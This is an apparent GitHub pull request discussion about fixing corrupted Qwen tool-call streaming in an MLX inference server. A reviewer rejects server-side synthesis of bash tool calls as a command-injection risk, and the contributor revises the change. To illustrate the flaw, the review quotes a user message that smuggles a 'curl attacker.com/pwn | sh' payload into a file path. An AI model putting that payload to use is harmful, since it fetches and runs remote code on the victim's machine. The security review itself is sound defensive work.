fix: Qwen tool streaming recovery#497
Conversation
|
Stack:
I ran into a scenario where asking the model to run a bash command (list the files in this folder) while streaming resulted in a corrupted output. This PR addresses that. I've attempted to follow your guide for contributing. Please let me know if there is anything missing. |
janhilgard
left a comment
There was a problem hiding this comment.
Thanks for the contribution and for following the guide! I understand the frustration with empty `<tool_call></>` wrappers — it's a real model failure case. However, this PR takes an approach that's architecturally dangerous for an inference server. Here's why:
Critical: Server-side tool call synthesis is fundamentally wrong
The core of this PR makes the inference server guess which tool the model meant to call and fabricate arguments. This violates the basic contract of an OpenAI-compatible API: the server faithfully reports what the model generates — it never invents content.
Security: Command injection
The synthesis logic extracts paths from user text via regex and inserts them into shell commands:
args["command"] = f"ls -la {_shell_quote_path(target)}"A malicious (or just unlucky) user message like:
list files in ~/'; curl attacker.com/pwn | sh; echo '
…gets turned into a synthesized bash command by the server. The client trusts tool calls because they came from the model — here they didn't. The _shell_quote_path function won't catch all edge cases (it never can when the server is fabricating shell commands).
Architectural: Hallucinating on behalf of the model
If the model emits an empty <tool_call></tool_call>, the correct responses are:
- Return any text before the marker as content
- Log a warning about malformed tool output
- Let the client/agent framework decide what to do (retry, fallback, etc.)
The server should never decide "the model probably meant bash" based on fuzzy heuristics like regex-matching "list|show|ls|dir" in the user message. This breaks:
- Deterministic reproducibility (same generation → different behavior depending on user text)
- Client trust (tool calls are no longer reliably from the model)
- Audit trails (who called the tool — the model or the server?)
Streaming deferral is too broad
The defer_content_until_finish flag triggers for all responses after tool messages — not just the broken case. This defeats streaming entirely for multi-turn tool-use conversations (which are the majority use case for tool-calling agents), turning every response into a single final chunk.
What to do instead
The real fix is much simpler:
- When the parser encounters
<tool_call></>or<tool_call></tool_call>with no content, treat it as content (not a tool call) — the model failed to generate a proper tool invocation. - Optionally strip the empty XML wrapper from the returned content.
- Log a warning:
logger.warning("Model emitted empty tool_call wrapper, treating as content")
The client/agent (in your case "Pi Agent") can then see the empty/garbled response and retry the request. This is the correct layer for recovery logic — the agent framework, not the inference server.
Minor: Good parts
- Hoisting
request.model_dump()intorequest_dictonce (instead of calling it repeatedly) is a nice perf improvement — I'd accept that as a standalone change. - The
try/except TypeErrorfallback for therequest=kwarg is a reasonable compatibility shim if the streaming parser API genuinely needs request context (for non-synthesis purposes).
tl;dr: An inference server must never fabricate tool calls. The empty-wrapper case should be treated as a generation failure and returned as content (or an empty response), letting the client decide how to recover.
Remove server-side synthesis for empty Qwen XML tool wrappers so the inference server no longer guesses tool names or fabricates arguments. Malformed empty wrappers now produce no tool calls and log a warning, leaving recovery to the client or agent framework. Keep post-tool chat streaming incremental by deriving deltas from cumulative decoded text instead of deferring the entire response until the final chunk. Add regression coverage for empty wrapper handling, no synthesized shell commands, and post-tool streaming behavior.
7138147 to
ce33946
Compare
Thanks for the thorough review, a lot of good points here. A bunch of this actually overlaps with an update I already had in flight, so I've folded your feedback into the update. Really appreciate the eye on it. |
Summary
Tests
uv run ruff check vllm_mlx/ tests/ --select E,F,W --ignore E402,E501,E731,F811,F841uv run black --check vllm_mlx/ tests/uv run pytest tests/test_qwen3_xml_parser.py tests/test_server.pyNotes
uv run mypy vllm_mlx/ --ignore-missing-imports --no-error-summarystill reports the repository's existing broad type-check baseline; CI marks that job continue-on-error.uv run pre-commit run --all-filesalso fails on existing full-repo hook issues: old Ruff hook argument parsing, broad line-length findings, and the same Mypy baseline. The CI-equivalent Ruff and Black checks above pass.